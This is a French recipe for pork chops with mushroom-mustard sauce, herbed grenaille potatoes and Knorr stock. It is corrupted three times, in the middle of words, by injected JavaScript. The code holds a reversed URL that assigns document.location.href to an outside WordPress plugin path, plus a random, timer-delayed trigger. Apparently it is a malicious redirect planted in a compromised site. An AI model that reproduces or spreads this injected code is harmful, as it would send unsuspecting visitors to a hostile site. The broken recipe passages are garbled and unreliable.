Temps de préparation : 25 minutes
Temps de cuisson : 30 minutes
– 1 Marmite de Bouillon Légumes KNORR
– 4 côtes de porc
– 200 g de champignons
– 800 g de pommes de terre grenaille
– 2 cuillères à soupe d’huile d’olive
– 2 cuillères à soupe de moutarde
– 20 cl de crème liquide
– 3 cuillères à soupe de fines herbes (cerfeuil, ciboulette, persil…)
Préparation de la recette :
Epluchez les pommes de terre grenaille et faites-les cuire dans un faitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout rempli d’eau pendant 20 minutes.
Pendant ce temps, lavez les herbes aromatiques et hachez-les finement.
Quand les pommes de terre sont cuites, égouttez-les et mélangez-les aux herbes fraîches.
Nettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyez et coupez les champignons.
Dans une poêle, chauffez 2 cuillères à soupe d’huile d’olive et ajoutez les côtes de porc. Faites cuire pendant 10 minutes en retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tournant la viande à mi-cuisson.
Ajoutez ensuite les champignons, la moutarde, la crème liquide et 1 Marmite de Bouillon Légumes KNORR ; remuez et laissez cuire 2 minutes.
Servez les côtes de porc nappées de sauce aux champignons et accompagnées de pommes de terre.